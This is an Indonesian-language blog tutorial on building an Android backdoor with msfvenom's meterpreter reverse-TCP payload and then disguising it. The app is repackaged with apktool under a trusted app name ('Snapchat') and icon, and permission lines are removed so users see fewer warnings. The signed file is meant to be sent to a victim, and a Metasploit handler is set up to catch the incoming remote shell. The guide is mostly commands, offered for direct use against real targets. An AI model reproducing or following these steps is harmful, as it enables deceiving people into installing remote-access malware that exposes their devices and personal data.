Cara Menyamarkan Backdoor APK Dengan APKTOOL
Kamu mungkin sudah membuat apk backdoor (paket android) sebelumnya pada kali, itu dilakukan dengan cara yang sama seperti kamu membuat exe backdoor. Yang dibuat dengan perintah msfvenom.
Dalam tutorial singkat ini aku akan menunjukkan cara mengubah ikon, izin, dan nama aplikasi, agar lebih meyakinkan bagi targetmu.
Langkah 1 Membuat Apk Backdoor
Jadi, mari kita mulai dengan membuat apk pada meterpreter. Masukkan kode ini di terminal
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk
Ini akan membuat app.apk di folder kamu saat ini.
Sekarang sampai pada bagian yang sulit.
Langkah 2 Menginstal Apktool
Kamu harus menginstal Apktool pada sistem, saya menggunakan windows untuk ini, tetapi harus dilakukan dengan cara yang sama di linux / mac os. Karena ini berbeda untuk semua orang, saya tidak akan menginstal alat ini. Lihatlah di situs web mereka untuk sistem kamu.
Perhatikan bahwa Apktool diinstal secara default di reverse engineering toolkit dari Kali linux!
Langkah 3 Dkompilasi Apk
Pertama periksa apakah kamu dapat menjalankan apktool dengan benar dengan menjalankan perintah:
apktool
Jika kamu melihat menu bantuan artinya instalasi sudah benar. Sekarang jalankan perintah
apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder
apktool sekarang akan mendekompilasi app.apk ke /pathtoyourfolder/folder. Di folder baru ini kamu akan menemukan beberapa file. Antara lain:
Folder 'res'
File AndroidManifest.xml
Folder 'smali'
Folder 'asli'
File apktool.yml
Langkah 4 Memodifikasi File
Untuk tutorial ini kita hanya akan memodifikasi file AndroidManifest.xml dan folder 'res'. Pertama, buka AndroidManifest.xml dengan editor teks. Saya menggunakan Notepad ++.
Kamu akan melihat sesuatu seperti ini:
Gambar melalui imgur.com
Pertama, mari kita hapus beberapa baris yang mungkin tidak kita perlukan dan akan memberi pengguna peringatan tambahan.
Sekarang kita masuk ke folder 'res'. Di sini kamu akan menemukan folder 'values', masuk ke dalamnya. Sekarang kamu akan menemukan 2 file, 1 bernama strings.xml, sekali lagi, buka file xml ini dengan editor teks.
kamu akan menemukan baris <string name="appname">MainActivity</string>
Ubah '' 'MainActivity' 'menjadi nama aplikasi yang kamu sukai, saya memilih nama '' Snapchat ''. Tetapi pilihlah nama yang menurut kamu cocok.
Simpan file dan kembali ke folder / res /.
Buat 3 folder bernama:
drawable-ldpi-v4
drawable-mdpi-v4
drawable-hdpi-v4
Sekarang kamu perlu menemukan ikon yang sesuai untuk aplikasimu.
Saya menggunakan Android Asset Studio situs web dan resizeimage.net
Tujuannya adalah untuk mendapatkan file 3 png dengan ukuran berikut:
36x36 (piksel) untuk folder ldpi
48x48 untuk folder mdpi
72x72 untuk folder hdpi
Beri nama file png ini semua 'icon.png' dan letakkan di folder yang sesuai.
Langkah 5 Menyusun Aplikasi
Proses ini sangat mudah. Kembali ke terminal apktool dan masukkan perintah berikut:
apktool b /pathtoyourfolder/folder
Ini akan membuat apk di folder 'dist' yang baru dibuat (ditemukan di apktool b / pathtoyourfolder / folder)
Langkah 6 Signing Apk
Saya menggunakan zip untuk signing apk atau jika itu tidak coba unduh file ini. Unzip file dan cd ke folder baru, sekarang gunakan perintah:
java -jar signapk.jar Certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk
Ini akan membuat file bernama signed.apk di folder baru yang dapat kamu kirim ke korban dan mereka akan melihat nama dan ikon aplikasi yang dikenal.
Langkah 7 Exploit
Sekarang bagian terakhir,
buka metasploit menggunakan:
msfconsole
Open multi/handleruse multi/handler
set the payload
set payload
android/meterpreter/reversetcp
set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)
and exploit
exploit
Sekarang setelah membuka aplikasi, kamu akan mendapatkan shell meterpreter yang masuk.
0 Comment:
Post a Comment